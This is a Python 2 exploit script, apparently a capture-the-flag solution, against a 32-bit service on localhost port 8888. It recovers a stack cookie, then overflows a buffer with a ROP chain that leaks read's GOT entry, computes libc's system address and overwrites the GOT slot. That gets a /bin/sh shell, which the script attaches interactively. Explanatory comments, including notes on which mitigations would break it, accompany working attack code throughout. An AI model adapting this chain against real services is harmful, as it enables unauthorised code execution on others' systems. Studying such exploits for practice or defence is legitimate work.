#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket, struct, re, telnetlib
def sock(remoteip, remoteport):
    """Open a TCP connection to ``remoteip:remoteport``.

    Returns a ``(socket, file)`` pair: the connected socket and an
    unbuffered read/write file object wrapping it.  ``makefile('rw',
    bufsize=0)`` is the Python 2 signature (Python 3 calls the argument
    ``buffering``); the unbuffered mode matters because callers mix
    ``socket.recv`` with ``file.read`` on the same connection.  Nothing is
    closed here -- the caller owns both objects.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((remoteip, remoteport))
    stream = conn.makefile('rw', bufsize=0)
    return conn, stream
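def read_until(f, delim='\n'):
    """Read from ``f`` one character at a time until ``delim`` has been seen.

    Args:
        f: file-like object whose ``read(1)`` returns one character, or the
           empty string once the stream is exhausted.
        delim: terminator; the returned data ends with it.  An empty
           delimiter matches immediately and nothing is read.

    Returns:
        Everything read, including the terminator.

    Raises:
        EOFError: the stream ended before ``delim`` appeared.  The previous
            version looped forever in that case, because ``read(1)`` returns
            '' at EOF and '' never ends with a non-empty delimiter -- a
            closed peer hung the caller instead of failing.
    """
    if not delim:
        return ''
    pieces = []
    # Only the last len(delim) characters can ever match, so keep just that
    # window instead of re-scanning a growing string on every iteration.
    tail = ''
    while not tail.endswith(delim):
        ch = f.read(1)
        if not ch:
            raise EOFError('stream closed before %r was seen' % (delim,))
        pieces.append(ch)
        tail = (tail + ch)[-len(delim):]
    return ''.join(pieces)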
def p(a):
    """Pack integer ``a`` as a 4-byte little-endian unsigned value.

    Raises ``struct.error`` if ``a`` does not fit in 32 bits.
    """
    packer = struct.Struct('<I')
    return packer.pack(a)
def u(a):
    """Unpack exactly 4 bytes as a little-endian unsigned 32-bit integer.

    Inverse of ``p``.  Raises ``struct.error`` if ``a`` is not exactly 4
    bytes long -- relevant when the input comes from a short ``recv``.
    """
    (value,) = struct.unpack('<I', a)
    return value
def shell(s):
    """Attach an interactive telnetlib session to the connected socket ``s``.

    ``Telnet.interact()`` relays local stdin to the socket and received data
    to stdout until the peer closes the connection.  The ``telnetlib`` module
    was removed from the standard library in Python 3.13 (PEP 594).
    """
    session = telnetlib.Telnet()
    session.sock = s
    session.interact()
def get_cookie():
    """Obtain the 4-byte "cookie" from the service on localhost:8888.

    Connects, discards up to 100 bytes of initial output, sends menu option
    ``4`` and a 10-byte line of ``y``, reads until that line is echoed back,
    and interprets the next 3 bytes from the peer -- with a zero byte
    prepended -- as a little-endian 32-bit value.  Host, port, the menu
    choice and the echo behaviour are assumptions about this one service.
    """
    s, f = sock('localhost', 8888)
    # recv() on the socket is interleaved with read() on its makefile below;
    # that only works because sock() created the file object unbuffered.
    # The 100 here is an upper bound, not a protocol length -- a shorter or
    # longer banner would desynchronise the following read_until.
    s.recv(100)
    s.send('4 \n')
    s.send('yyyyyyyyyy\n')
    # Skip the echoed input; what follows is treated as the cookie.
    read_until(f, 'yyyyyyyyyy\n')
    # Only 3 bytes are read and the low byte is assumed to be 0x00.  recv(3)
    # may legally return fewer bytes, in which case u() raises struct.error.
    return u('\x00' + s.recv(3))
# NOTE: Python 2 script (print statements; str is a byte string), so the raw
# string sends below need no explicit encode.
# Defensive reading: the chain below only works while three things hold at
# once -- the 4-byte cookie is recoverable (see get_cookie), the executable's
# .plt/.got addresses are fixed (no PIE), and the GOT slot for read is writable
# at run time (no full RELRO).  Any one of those mitigations breaks the script.
cookie = get_cookie()
print "[*] cookie: {}".format(hex(cookie))
# Hard-coded addresses inside the target binary (0x0804xxxx is typical of a
# non-PIE 32-bit ELF).  binsh and pop3ret are named, not derived: presumably a
# "/bin/sh" string and a pop;pop;pop;ret gadget -- confirm against the binary.
# The two libc offsets tie the script to one specific libc build.
read_plt = 0x8048620
write_plt = 0x80486e0
read_got = 0x804b010
binsh = 0x804970d
pop3ret = 0x8048b2c
libc_read_offset = 0xdb4f0
libc_system_offset = 0x40190
# Fresh connection for the real run, driving the same menu path as get_cookie
# but waiting for the actual prompts instead of a fixed-size recv.
s, f = sock('localhost', 8888)
read_until(f, 'Give up\n')
s.send('4 \n')
read_until(f, 'sure? (y/n) ')
# Payload layout: 10 bytes of 'y', the cookie (so whatever check consumes it
# still passes), 12 filler bytes whose length is specific to this target, then
# three chained calls through the PLT.
payload = ''
payload += 'y'*10
payload += p(cookie)
payload += 'a'*12
# Call 1: write(0, read_got, 4) -- sends back the 4 bytes currently held in
# read's GOT slot.  pop3ret is the return address that discards the three
# arguments before the next call.
payload += p(write_plt)
payload += p(pop3ret)
payload += p(0)
payload += p(read_got)
payload += p(4)
# Call 2: read(0, read_got, 4) -- replaces that GOT slot with 4 bytes we send.
payload += p(read_plt)
payload += p(pop3ret)
payload += p(0)
payload += p(read_got)
payload += p(4)
# Call 3: enters via the now-rewritten slot with binsh as its only argument.
# 0xdeadbeaf is the return address after that call and is never meant to run.
payload += p(read_plt)
payload += p(0xdeadbeaf)
payload += p(binsh)
s.send(payload+'\n')
# The 4 bytes from call 1 are read's address in libc; subtracting its offset
# gives the libc base.  recv(4) may return fewer bytes, in which case u()
# raises struct.error rather than producing a wrong address.
libc_read = u(s.recv(4))
libc_base = libc_read - libc_read_offset
libc_system = libc_base + libc_system_offset
print "[*] libc system: {}".format(hex(libc_system))
# These are the 4 bytes call 2 reads into the GOT slot; read(.., 4) consumes
# only them, so the trailing '\n' stays in the peer's input.
s.send(p(libc_system)+'\n')
print "Got a Shell!"
shell(s)